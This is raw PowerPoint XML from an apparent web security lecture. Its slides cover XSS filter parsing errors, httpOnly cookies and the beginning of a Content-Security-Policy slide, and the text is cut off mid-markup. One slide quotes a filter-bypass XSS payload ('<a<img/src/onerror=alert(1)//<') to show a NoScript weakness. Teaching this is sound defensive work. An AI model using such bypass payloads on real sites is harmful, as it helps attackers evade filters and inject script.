          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10899000" y="2762893"/>
            <a:ext cx="763560" cy="1719000"/>
            <a:chOff x="10899000" y="2762893"/>
            <a:chExt cx="763560" cy="171900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8CBBDF0-6A15-D043-966A-B6237507712E}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10899000" y="2762893"/>
                <a:ext cx="696240" cy="1715400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18CBBDF0-6A15-D043-966A-B6237507712E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10881000" y="2744893"/>
                  <a:ext cx="731880" cy="1751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6A1A001-55DF-3749-83F7-C13A7D6FA971}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="11526480" y="4461733"/>
                <a:ext cx="136080" cy="20160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="7" name="Ink 6">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6A1A001-55DF-3749-83F7-C13A7D6FA971}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="11508840" y="4443733"/>
                  <a:ext cx="171720" cy="55800"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19276016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22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222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222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2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2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6E92D59-FD1B-47BC-9D02-0F3B959A6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92AE646-CC19-4A1F-900B-E512D06A7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14E4F834-34CB-4787-920F-CD1E1B8BC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98306" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{899F3146-8EB1-2943-8F86-01B03E15BD54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="707830" y="727823"/>
            <a:ext cx="3329150" cy="5402353"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Simulation Errors in Filters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52229" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6572F06-A4B8-384C-AEB2-B479E95DC307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3821373" y="837006"/>
            <a:ext cx="7628083" cy="4089838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Filter must predict how the browser would parse a given sequence of characters… this is hard!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>NoScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Did not know that / can delimit HTML attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;a&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=alert(1)//&lt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>noXSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Did not understand HTML entity encoded JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>IE8 filter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Did not use the same byte-to-character decoding as the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98309" name="Picture 5" descr="a.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93457D95-A43C-AB44-81A6-375EFE7BE5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74140" y="4507673"/>
            <a:ext cx="6239102" cy="15441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84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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1083CBD2-FD57-014B-8C1B-12B29155A32B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>httpOnly Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101380" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B61B94D-FD9E-144E-A204-AFEE6D0F6DF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711958" y="4505870"/>
            <a:ext cx="10768084" cy="1577787"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Cookie sent over HTTP(S), but cannot be accessed by script via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Prevents cookie theft via XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng" dirty="0"/>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> stop most other XSS attacks!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101381" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{632F7F8F-863B-2347-AF01-4C0629495162}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971801" y="2400090"/>
            <a:ext cx="1128713" cy="8382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sz="2000">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101382" name="AutoShape 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A791DB1C-194B-D748-AD98-07CB09772CAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3071813" y="2500102"/>
            <a:ext cx="914400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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Browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101383" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9716D16F-4302-514C-A375-7721EED335F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3238290"/>
            <a:ext cx="1524000" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="parallelogram">
            <a:avLst>
              <a:gd name="adj" fmla="val 166667"/>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sz="2000">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101384" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F279FE4-264F-CE41-8F06-BA2AAB078400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3466890"/>
            <a:ext cx="1143000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="952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sz="2000">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101385" name="Freeform 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{361CAFBB-998F-FD49-8F82-F393B8C9171A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3714750" y="3233528"/>
            <a:ext cx="400050" cy="385763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 252"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T3" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 252"/>
              <a:gd name="T5" fmla="*/ 0 h 243"/>
              <a:gd name="T6" fmla="*/ 0 w 252"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T8" fmla="*/ 0 w 252"/>
              <a:gd name="T9" fmla="*/ 2147483647 h 243"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 252"/>
              <a:gd name="T16" fmla="*/ 0 h 243"/>
              <a:gd name="T17" fmla="*/ 252 w 252"/>
              <a:gd name="T18" fmla="*/ 243 h 243"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="252" h="243">
                <a:moveTo>
                  <a:pt x="0" y="243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="252" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="147"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101386" name="AutoShape 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{646B8BCC-4F5F-FC41-A30D-D2AAD1277650}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7696200" y="2323891"/>
            <a:ext cx="1219200" cy="1271587"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 26074"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>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Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101387" name="Line 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D166331E-AC4E-1346-8BEF-872B06AD383E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="2689015"/>
            <a:ext cx="3581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en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101388" name="Text Box 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F412CDF7-BC64-7145-B7A5-13F491BAA603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5692020" y="2308015"/>
            <a:ext cx="6158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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101389" name="Line 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCDB9C3-989C-1044-836C-91B76C21E167}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="3070015"/>
            <a:ext cx="3581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nchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101390" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4664D2-91BD-E441-86FA-9443E99E81BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="3085890"/>
            <a:ext cx="457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371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>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tabLst>
                <a:tab pos="1371600" algn="l"/>
              </a:tabLst>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HTTP Header:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Set-cookie:	 NAME=VALUE ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FF3399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>httpOnly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="557131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99330" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D2099E-5EAE-3543-9B1B-E75D1E947FAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="832520" y="1000370"/>
            <a:ext cx="3496000" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Using CSP to Whitelist Origins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23583C74-7DDA-644E-81AC-B4C227371E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963690" y="1000370"/>
            <a:ext cx="6559267" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Content-Security-Policy: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   default-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'self’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
